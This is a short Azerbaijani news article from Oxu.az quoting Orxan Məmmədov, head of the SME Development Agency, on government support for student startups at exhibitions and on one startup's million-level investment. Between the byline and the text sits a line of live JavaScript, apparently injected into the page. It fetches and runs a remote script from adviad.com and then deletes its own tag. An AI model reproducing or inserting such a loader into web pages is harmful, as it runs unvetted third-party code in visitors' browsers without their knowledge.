Orxan Məmmədov: “Startaplardan biri bir milyonluq investisiya qazanmışdı”

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Məqsədimiz gənc və tələbə olan startapçıların bu kimi festivallarda öz layihələrini nümayiş etdirməsidir”.

Oxu.Az bildirir ki, bunu jurnalistlərə açıqlamasında Kiçik və Orta Biznesin İnkişafı Agentliyinin (KOBİA) İdarə Heyətinin sədri Orxan Məmmədov deyib.

O bildirib ki, nümayiş etdirilən startaplar investorların diqqətini çəkir:

“Əsasən biz gənclərə maddi və mənəvi dəstək verərək startap layihələrini nümayiş etdirmələrinə dəstək oluruq. Tək yerli deyil, xaricdə keçirilən sərgilərdə də biz gənc startapçılara tam maddi dəstək göstəririk”.

O.Məmmədov qeyd edib ki, startap layihələri sırf investorların marağından asılıdır:

“50 startapçıdan təxminən 11-i sərgiyə seçilib. Ona görə də bütün bu startapçıların potensialının olduğuna güvənirik. Keçən il internet üzərindən hazırlanan startap ABŞ-dan olan investor tərəfindən bir milyonluq investisiya qazanıb. Bu bizim uğurlarımızdan sayılır. Dünyada startap sahəsində rəqəmləri götürsək, bunlardan 10 faizə qədəri investisiya cəlb edir və məbləğ yüksək olur. Biz hər bir startapa ciddi yanaşırıq”.

Samir İsayev

Oxu.az

Bu yazılara da göz atın...